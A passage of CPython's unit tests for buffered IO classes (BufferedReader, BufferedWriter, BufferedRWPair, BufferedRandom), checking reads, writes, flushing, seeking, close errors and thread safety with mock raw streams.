raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
